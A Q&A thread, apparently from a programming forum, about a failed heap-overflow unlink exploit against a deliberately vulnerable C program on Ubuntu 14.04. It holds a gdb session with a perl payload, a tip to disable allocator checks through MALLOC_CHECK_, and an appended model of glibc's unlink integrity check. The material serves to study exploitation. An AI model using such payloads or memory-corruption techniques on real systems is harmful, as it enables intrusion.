
I have been trying to exploit the heap overflow vulnerability for the program below, I am running Linux 14.04.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int n = 5;

int main(int argc, char **argv) {
    char *p, *q;

    p = malloc(1024);
    q = malloc(1024);
    if (argc >= 2)
            strcpy(p, argv[1]);
    free(q);
    printf("n = 0x%08x\n", n);
    free(p);
    return 0;
}

In this exploit I am trying to write a 32-bit random stack address into the variable "n" present in the program, using the unlink() technique.

However, when free() is called the program segfaults.

This is my input:

(gdb) p &n
$1 = (<data variable, no debug info> *) 0x804a02c <n>
(gdb) x/xw 0x804a02c-0xc  (address-12 bytes)
0x804a020 <__libc_start_main@got.plt>:  0xb7e27990
(gdb) x/2xw $ebp
0xbffff1c8: 0x00000000  0xb7e27a83
0xbffff1c8+4bytes=0xbffff1cc

(gdb) r `perl -e 'print "A"x1024 . "\xfc\xff\xff\xbf"x2 . "XXXX" . "\x20\xa0\x04\x08" . "\xcc\xff\xff\xbf"'`

The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/HIIII/heap_overflow/test/heap_1 `perl -e 'print "A"x1024 . "\xfc\xff\xff\xbf"x2 . "XXXX" . "\x20\xa0\x04\x08" . "\xcc\xff\xff\xbf"'`

Program received signal SIGSEGV, Segmentation fault.

=> 0xb7e857e0 <__GI___libc_free+64>:    mov    (%eax),%eax
   0xb7e857e2 <__GI___libc_free+66>:    movl   $0x0,0x20(%esp)
   0xb7e857ea <__GI___libc_free+74>:    add    $0x18,%esp
   0xb7e857ed <__GI___libc_free+77>:    pop    %ebx
   0xb7e857ee <__GI___libc_free+78>:    jmp    0xb7e82520 <_int_free>
   0xb7e857f3 <__GI___libc_free+83>:    nop

0xbffff180: 0xbffff1c8  0xb7ff2500  0x0804b412  0xb7e857a0

0xbffff190: 0x0804b410  0xb7e857a6  0xb7fb9000  0x08048500

0xbffff1a0: 0x0804b410  0xbffff3d6

0xb7e857e0 in __GI___libc_free (mem=0x804b410) at malloc.c:2945
2945    malloc.c: No such file or directory.


I have taken this attack vector from http://www.win.tue.nl/~aeb/linux/hh/hh-11.html (uses glibc-2.2.4)

Thanks in advance

user10012

1 Answer


There was some very careful algebra done on this site on the variables that manage a doubly linked list of addresses. Have you investigated the source code for malloc.c and unlink to see that the code has not changed in some way? I believe you will find your problem in there.

ojblass
Thanks @ojblass, I am successfully able to overwrite the metadata as discussed on the site and I get an error saying 'double free() detected'. I overcome this error using 'export _MALLOC_CHECK_=0'. However, the error vanishes but I am not able to accomplish my task. – user10012 Mar 22 '15 at 10:00
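As an added illustration of the unlink change the answer points at (this is example code written for this page, not glibc's source and not the asker's exploit): the unlink() macro in the glibc that Ubuntu 14.04 ships (2.19) first verifies that the chunk's fd and bk neighbours point back at the chunk, and reports "corrupted double-linked list" when they do not, so the FD->bk / BK->fd stores that the hh-11 write-up relies on never happen. The chunk model below keeps only the fields that check reads, the demo_* functions and the enum are my simplification, and the corrupted case uses constructed dummy chunks rather than the addresses in the question.

```c
#include <stddef.h>
#include <stdio.h>

/* Simplified model of a free chunk header: only the fields unlink() reads.
   (Example layout, not glibc's malloc_chunk.) */
typedef struct chunk {
    size_t prev_size;
    size_t size;
    struct chunk *fd;   /* next chunk in the free list */
    struct chunk *bk;   /* previous chunk in the free list */
} chunk;

enum unlink_result {
    UNLINK_OK = 0,
    UNLINK_BAD_FD,   /* p->fd->bk != p : forward neighbour does not point back */
    UNLINK_BAD_BK    /* p->bk->fd != p : backward neighbour does not point back */
};

/* The consistency check glibc 2.19's unlink() performs before touching the
   neighbours (FD->bk != P || BK->fd != P). Reports which condition failed. */
enum unlink_result unlink_validate(const chunk *p) {
    if (p->fd->bk != p) return UNLINK_BAD_FD;
    if (p->bk->fd != p) return UNLINK_BAD_BK;
    return UNLINK_OK;
}

/* Checked unlink: the two stores below are the classic FD->bk = BK and
   BK->fd = FD writes, but they run only when both neighbours are consistent. */
enum unlink_result unlink_checked(chunk *p) {
    enum unlink_result r = unlink_validate(p);
    if (r != UNLINK_OK) return r;           /* glibc would abort here instead */
    chunk *fd = p->fd, *bk = p->bk;
    fd->bk = bk;
    bk->fd = fd;
    return UNLINK_OK;
}

/* Case 1: a genuine circular list head <-> a <-> b. Unlinking a must succeed
   and leave head <-> b. Returns 1 on the expected outcome, 0 otherwise. */
int demo_genuine_list(void) {
    chunk head = {0}, a = {0}, b = {0};
    head.fd = &a;  a.bk = &head;
    a.fd = &b;     b.bk = &a;
    b.fd = &head;  head.bk = &b;
    if (unlink_checked(&a) != UNLINK_OK) return 0;
    return head.fd == &b && b.bk == &head;
}

/* Case 2 (constructed): fd and bk have been overwritten to point at two unrelated
   words, the state an overflow of the neighbouring chunk produces. Neither target
   points back, so the fd check fails first and the targets are never written. */
enum unlink_result demo_corrupted_pointers(void) {
    chunk victim = {0}, fake_fd = {0}, fake_bk = {0};
    victim.fd = &fake_fd;
    victim.bk = &fake_bk;
    enum unlink_result r = unlink_checked(&victim);
    if (fake_fd.bk != NULL || fake_bk.fd != NULL) return UNLINK_OK; /* model bug guard */
    return r;
}

/* Case 3 (constructed): only the forward neighbour is consistent; the second
   half of the check still rejects the chunk. */
enum unlink_result demo_one_sided(void) {
    chunk victim = {0}, fwd = {0}, back = {0};
    victim.fd = &fwd;   fwd.bk = &victim;   /* consistent */
    victim.bk = &back;  back.fd = NULL;     /* not consistent */
    return unlink_checked(&victim);
}

int main(void) {
    printf("genuine list unlinked correctly: %d\n", demo_genuine_list());
    printf("corrupted fd/bk result: %d (1 = fd check failed)\n", demo_corrupted_pointers());
    printf("one-sided result:       %d (2 = bk check failed)\n", demo_one_sided());
    return 0;
}
```

Seen against the question's crash: with this check in place, a chunk whose bk is a stack word and whose fd is a GOT address has neighbours that cannot point back at it, so the allocator never performs the write the 2.2.4-era technique counted on; the exact failure mode (abort, diagnostic, or a crash elsewhere) depends on the allocator's configured check action.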